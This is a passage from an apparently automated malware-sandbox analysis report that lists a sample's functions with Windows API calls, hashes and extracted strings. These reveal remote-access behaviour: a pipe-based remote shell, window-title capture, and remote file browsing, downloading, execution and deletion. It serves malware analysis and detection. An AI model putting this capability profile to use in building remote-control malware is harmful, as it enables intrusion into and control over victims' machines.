                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _wcslen
                                • String ID: pQG
                                • API String ID: 176396367-3769108836
                                • Opcode ID: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                                • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
                                • Opcode Fuzzy Hash: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                                • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B77B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON
                                Download Yara Rule
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B793
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID: @
                                • API String ID: 1890195054-2766056989
                                • Opcode ID: 1ad00b6035bb2f9c69a92d20b28944e38dc856d82cbe2acb3b3194101eb7e45b
                                • Instruction ID: 3917006bb4bdf28dbebd301c315ba2c969ca89c82ab29e5da1363915d2377671
                                • Opcode Fuzzy Hash: 1ad00b6035bb2f9c69a92d20b28944e38dc856d82cbe2acb3b3194101eb7e45b
                                • Instruction Fuzzy Hash: EBE0C9B6901228EBCB10DFA9E94498DFBF8FF48620B008166ED08A3704D770A815CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B7B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                Download Yara Rule
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID: @
                                • API String ID: 1890195054-2766056989
                                • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                Download Yara Rule
                                APIs
                                • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                  • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateEventStartupsocket
                                • String ID:
                                • API String ID: 1953588214-0
                                • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
                                • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
                                • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                • Opcode Fuzzy Hash: 42a83028ea29ee4520479fdfd1ce509581fbe236408560bbb12e48215694f405
                                • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041BA96 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                Download Yara Rule
                                APIs
                                • GetForegroundWindow.USER32 ref: 0041BAB8
                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BACB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$ForegroundText
                                • String ID:
                                • API String ID: 29597999-0
                                • Opcode ID: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                • Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
                                • Opcode Fuzzy Hash: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                • Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00414EE9 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                Download Yara Rule
                                APIs
                                • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,00415188,00000000,00000001), ref: 00414F0B
                                • WSASetLastError.WS2_32(00000000), ref: 00414F10
                                  • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                  • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
                                  • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                  • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                  • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                                  • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                  • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                  • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                • String ID:
                                • API String ID: 1170566393-0
                                • Opcode ID: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                • Instruction ID: cadd3d9b0d0923a9352550a0b766658ea18523973fceddbfefdc7c35282954d4
                                • Opcode Fuzzy Hash: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                • Instruction Fuzzy Hash: 9ED017322015316BD320A769AC01AFBAA9EDBD7771B16003BFA08D3210D6949C8282E8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                Download Yara Rule
                                APIs
                                • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Startup
                                • String ID:
                                • API String ID: 724789610-0
                                • Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                • Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
                                • Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                • Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00418656 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                Download Yara Rule
                                APIs
                                • GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: FromGdipImageLoadStream
                                • String ID:
                                • API String ID: 3292405956-0
                                • Opcode ID: e0ea2fd9c2167727364d599a07cfbc1f38e77f7b891a0d9c190b1ac43297e8d6
                                • Instruction ID: 0579cdaa2312361b05b1f830050c5177e031bffd5630af46111334d5679ce4a0
                                • Opcode Fuzzy Hash: e0ea2fd9c2167727364d599a07cfbc1f38e77f7b891a0d9c190b1ac43297e8d6
                                • Instruction Fuzzy Hash: 67D0C9B6504310AFC3619F04DC40AA2B7E8EB19322F11882BA495C3620D3749C448B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004186CB Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                Download Yara Rule
                                APIs
                                • GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: GdipImageSaveStream
                                • String ID:
                                • API String ID: 971487142-0
                                • Opcode ID: 2f33f8506b529e9adaa30f706a2711de8e29ced3bba7258ed69267e28c87a11e
                                • Instruction ID: 17179325133ec8d5665930926395a02cde82b473ee5165108a88b5cb6818835a
                                • Opcode Fuzzy Hash: 2f33f8506b529e9adaa30f706a2711de8e29ced3bba7258ed69267e28c87a11e
                                • Instruction Fuzzy Hash: 15C0C932008351AB8B529F409C09C9FBAA6BB88310B040C1DF15542121CB258C659B65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00404BE5 Relevance: 1.5, APIs: 1, Instructions: 11threadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,Function_00004C01,004758E8,00000000,00000000), ref: 00404BF8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread
                                • String ID:
                                • API String ID: 2422867632-0
                                • Opcode ID: d0931feda09ce7f383c7c6ce2665332ecb22035d53701456b05fd966ed568352
                                • Instruction ID: dbdeaac90e0e6d62f0477abc41fa170e90117b3f4e073e3287e2bae6f82229ff
                                • Opcode Fuzzy Hash: d0931feda09ce7f383c7c6ce2665332ecb22035d53701456b05fd966ed568352
                                • Instruction Fuzzy Hash: 10C04CF1514200BFB604CB20CD89D37B79DD75070171589697944D2551D576DC41D538
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004027A7 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                Download Yara Rule
                                APIs
                                • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Deallocatestd::_
                                • String ID:
                                • API String ID: 1323251999-0
                                • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00418679 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                Download Yara Rule
                                APIs
                                • GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: DisposeGdipImage
                                • String ID:
                                • API String ID: 1024088383-0
                                • Opcode ID: 0d829d07429a4b0b4d75c9354fe46aa387a3f48e8024eabd43fe848e5855e457
                                • Instruction ID: e934c4c25458857afa6134ff150cf5673f3742efb43c7687e3c91c45999faaed
                                • Opcode Fuzzy Hash: 0d829d07429a4b0b4d75c9354fe46aa387a3f48e8024eabd43fe848e5855e457
                                • Instruction Fuzzy Hash: B9A011B0000200CFCF020F208B080203EA0AB0A30A32080E8800808222C333C803CE2A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 00407C97 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                Download Yara Rule
                                APIs
                                • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                  • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C2EC
                                  • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C31C
                                  • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C371
                                  • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C3D2
                                  • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,Pj,004752F0,00000001), ref: 0041C3D9
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                • DeleteFileA.KERNEL32(?), ref: 00408652
                                  • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                  • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                  • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                  • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                • Sleep.KERNEL32(000007D0), ref: 004086F8
                                • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                                  • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                • API String ID: 1067849700-181434739
                                • Opcode ID: d1291a2975022f809a0102ef99360669830263d322e895bfdab655d30a7aff4d
                                • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                • Opcode Fuzzy Hash: d1291a2975022f809a0102ef99360669830263d322e895bfdab655d30a7aff4d
                                • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 004056E6
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                • __Init_thread_footer.LIBCMT ref: 00405723
                                • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                • CloseHandle.KERNEL32 ref: 00405A23
                                • CloseHandle.KERNEL32 ref: 00405A2B
                                • CloseHandle.KERNEL32 ref: 00405A3D
                                • CloseHandle.KERNEL32 ref: 00405A45
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
